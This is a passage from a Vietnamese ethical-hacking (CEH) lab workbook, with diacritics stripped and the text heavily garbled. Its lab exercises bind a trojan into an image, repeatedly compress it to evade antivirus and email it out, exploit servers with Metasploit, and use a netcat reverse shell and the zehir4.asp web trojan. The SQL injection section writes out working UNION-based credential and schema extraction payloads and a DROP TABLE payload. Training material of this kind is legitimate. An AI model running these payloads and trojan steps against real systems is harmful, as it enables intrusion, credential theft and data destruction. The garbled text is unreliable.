Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 74
Bài 7:
Social Engineering I/ Gii Thiu

K thut la đo (Social Engineering) là mt th thut đc nhiu hacker s dng cho
các cuc thâm nhp vào các h thng mng, máy tính. ây là mt trong nhng phng thc
hiu qu đ đánh cp mt khu, thông tin, tn công vào h thng.

Di đây là câu chuyn có tht v mt trong nhng hacker ni ting nht th gii
trong vài nm tr
 li đây - Kevin Mitnick (M, tng b 8 nm tù vì ti tn công vào h thng
máy tính), chuyên gia hàng đu v k thut Social Engineering. Lên k hoch tn công vào
công ty X, Kevin vn dng k nng này đ dò tìm thông tin liên quan đn ông tng giám đc
và mt tr lý ca ông này. Li dng lúc hai ngi đi công tác, anh ta s dng Call ID gi,
nhái ging nói ca viên tr lý đ gi đn qun tr mng công ty, yêu cu gi mt kh
u đng
nhp vào h thng ca tng giám đc vì ngài đã quên mt khu. Qun tr viên kim tra mt
vài thông tin v "viên tr lý", nhng Kevin đã có đ thông tin và s khôn ngoan đ tr li. Kt
qu là Kevin đã ly đc mt khu và kim soát toàn b h thng mng ca công ty X.

Mt hình thc la đo khác: Mt ngày xu tri nào đó, bn nhn đc đ
in thoi,
đu dây bên kia là mt ging nói ngt ngào: "Chào anh, dch v mà anh đang s dng ti
công ty chúng tôi hin đang b trc trc vi account (tài khon) ca anh.  ngh anh gi gp
thông tin v tài khon cho chúng tôi đ điu chnh li". Mi nghe qua tng nh đây là mt
kiu la thô thin, nhng xác sut thành công rt cao, đc bit khi ging nói đó d thng nh



Ta s dng lnh ‘ MMB “60.ico” “svchost.exe” “cathu.jpg” “trojanhao.exe” ‘ đ
ghép file trojan svchost.exe vi cathu.jpg và vi icon là 60.ico.
Tip theo, ta nén file trojan mi bng Winrar li nhiu ln đ tránh chng trình Anti-
virus(tùy theo phiên bn Anti-virus, tuy nhiên hu ht các trojan không qua mt đc các
chng trình này) và thay đi thông tin ca outlook.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 76

Ta vào ToolåOptionåMail setupåView Accountå Chn Account cn thay đi và
thay đi thông tin Your Name và E-mail Address.

Tip theo Attach file đính kèm vào và gi Email đi. Trong bài Tác gi gi ti đa ch
email
[email protected]
, và sau đó check mail đ kim tra th xem mail đã đn cha.

Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 77
Bài 8:
Session Hijacking

Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 79 Sau khi Session b ly, session t máy Telnet s b “ Lost connection” và ngi s
dng trong trng hp này không bit là mình b “Lost Connection “bi nguyên nhân nào.
Bây gi ta bt Service SSH ca máy Linux bng lnh “ Service sshd” và test th session
hijacking đi vi traffic ssh.



Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 81

Ta không thy thông tin v FTP Server  đây, do phn mm Retina ch có tính nng
nhn din các Service ca Microsoft và nhng Service thông dng. Còn các Service không
thông dng hn thì phn mm ch thy di dng m port. Trong trng hp này ta thy m
port 21.

Ta s dng Metasploit đ khai thác li Apache và ly đc (Console). Rank Vulnerability Name Count
1. echo service 1
2. ASN.1 Vulnerability Could Allow Code Execution 1
3. Windows Cumulative Patch 835732 Remote 1
4. Null Session 1
5. No Remote Registry Access Available 1
6. telnet service 1
7. DCOM Enabled 1
8. Windows RPC Cumulative Patch 828741 Remote 1
9. Windows RPC DCOM interface buffer overflow 1
10. Windows RPC DCOM multiple vulnerabilities 1
11. Apache 1.3.27 0x1A Character Logging DoS 1
12. Apache 1.3.27 HTDigest Command Execution 1
13. Apache mod_alias and mod_rewrite Buffer Overflow 1
14. ApacheBench multiple buffer overflows 1
15. HTTP TRACE method supported 1
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 82

soát đc máy nn nhân.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 84 Bài lab 2: Khai thác li ng dng Server U
Tng t nh bài trên, ta s dng chng trinh nmap đ xác đnh version ca ServerU
và s dng metaesploit đ tn công.


Bài Lab 1: Cross Site Scripting
u tiên ta login vào bng username “jv” và password “ jv789” và chn chc nng
“post message”. Sau đó ta post script vào phn message text.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 86
Sau đó ta submit đ post script này lên. Ta s dng F5 đ Refresh li trình duyt và
thy xut hin. Lúc này trình duyt ca nn nhân vô tình đã thc hin script đc user post lên Server.
Da vào script này, tin tc có th n cp cookie ca nn nhân và log in vào h thng.

Bài Lab 2: Insufficient Data Validation
Trong bài Lab này khi chuyn tin t tài khon này sang tài sn khác, tham s amout
luôn luôn phi ln hn 0. Tuy nhiên trong 1 s trng hp Hacker có th thay đi con s này
là s âm bng nhng chng trình “http proxy”. Kt qu này có th gây hi đn các khon tài
chính ca ngân hàng HackmeBank.

Ta th chuyn v
i giá tr Amout 100 t tài khon bt k sang tài khon khác
Kt qu thành công. Ta tip tc chuyn thêm 1 ln na nhng vi giá tr là -100. Tuy
nhiên do có kim tra di phía client nên vic chuyn tin không thành công.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 87

Bài Lab 4: Authorization Failure

u tiên ta vào xem các account ca user “jc” password “jc789”. Ta thy account Number là 5204320422040005, 5204320422040006, 520432
0422040007, 5204320422040008. User jc ch quán lý đc các account thông s trên. Tuy
nhiên ta chú ý đn phn URL khi s dng tính nng “View Transaction”.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 90
Ta thay thông s 5204320422040005 bng thông s 5204320422040004(thông s này
không thuc account qun lý ca user jc). Nh vy web site đang b li phân quyn.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 91
Bài 11:
SQL INJECTION I/ Gii thiu v SQL Injection:
ây là K thut tn công này li dng nhng l hng trên ng dng(không kim tra k
nhng kí t nhp t ngi dùng). Thc hin bng cách thêm các mã vào các câu lnh hay câu
truy vn SQL (thông qua nhng textbox) trc khi chuyn cho ng dng web x lý, Server s
thc hin và tr v cho trình duyt (kt qu câu truy vn hay nhng thông báo li) nh đó mà
các tin tc có th thu thp d

a nó:

Login page::::

username: ' Union select [column] from [table] where [column2= ]
password: everything

Vd: Gi s ta đã bit 2 column username và password trong table VTABLE cua db victim là
VUSER và VPASS thì ta làm nh sau
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 92

username: ' Union select VPASS from VTABLE where VUSER='admin' (1)
password: everything

(1): Trong trng hp này admin là mt user mà bn bit nu không có th b trng, nó s
cho bn user đu tiên

KQ:
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement
containing a UNION operator must have an equal number of expressions in their target lists. Nu KQ ra nh trên có ngha là bn phi union thêm nhiu column na đ tt c column ca
table VTABLE đc Union ht. Structure ca nó nh sau:

username: ' Union select VPASS,1,1,1 1,1 from VTABLE where VUSER='admin' (1)
password: everything

Bn hãy thêm ",1" cho đn khi kt qu ra đi loi nh


3) Ly ht table và column ca ca database:
Bí quyt chính là table này ca database: INFORMATION_SCHEMA.TABLES vi column
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 93
TABLE_NAME (cha toàn b table) và table: INFORMATION_SCHEMA.COLUMNS vi
column COLUMN_NAME (cha toàn b column)

Cách s dng dùng Union:

Login page:::::::
username: ‘ UNION SELECT TABLE_NAME,1,1,1…,1 FROM
INFORMATION_SCHEMA.TABLES WHERE ……. Nh vy ta có th ly đc ht table, sau khi có table ta ly ht column ca table đó:

Login page:::::::
username: ‘ UNION SELECT COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’… ’ and …… Trên đây là nhng điu cn bn nht v SQl injection mà tôi có th cung cp cho các bn, còn
làm đc tt hay không thì phi có mt chút sáng to na hy vng nó giúp ích cho các bn
mt chút khi gp mt site b SQl injection 4)Không s dng UNION:

Nu các b
vd: '; DROP TABLE VTABLE

II/ Thc Hành Bài Lab
Trong bài này Hacker (máy 192.168.1.44) s thông qua Port Web đ tn công vào
Server 2000(192.168.1.46) và s upload lên Server 2000 trojan webbase, sau đó kim soát
Server này.
u tiên s dng phn mm Acunetix đ quét xem Server Web có b li ng dng gì
không??

Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 95 Ta có th test bng tay trong tình hung này bng cách thêm du “ ‘ “ trong form
login.
Sau đây là 1 s đon mã đ ly thông tin v Server khi bit Server b li SQL.

1/lay ten Server name

'and 1=convert(int,@@servername) sp_password

2/lay database name


Chy lng nghe  phía Client
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 97 Telnet net ngc ra ngoài t Server. Và kt ni netcat đc hình thành sau khi telnet ngc ra t Server, lúc này chúng ta
đã by pass đc Firewall.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 98
Sau khi kt ni đc màn hình console ca Window, ta tip tc upload thêm 1 trojan
di dng web thông qua TFTP.
Trojan web mà chúng ta s dng là zehir4.asp, đây là trojan khá nhiu tin dng. T
trojan này ta có th thc hin d dàng vic xóa Database, vic download các file t Server
2000 v máy ca mình thông qua Port Web

Trích đoạn ntr đi vi các th th ut khai thác

---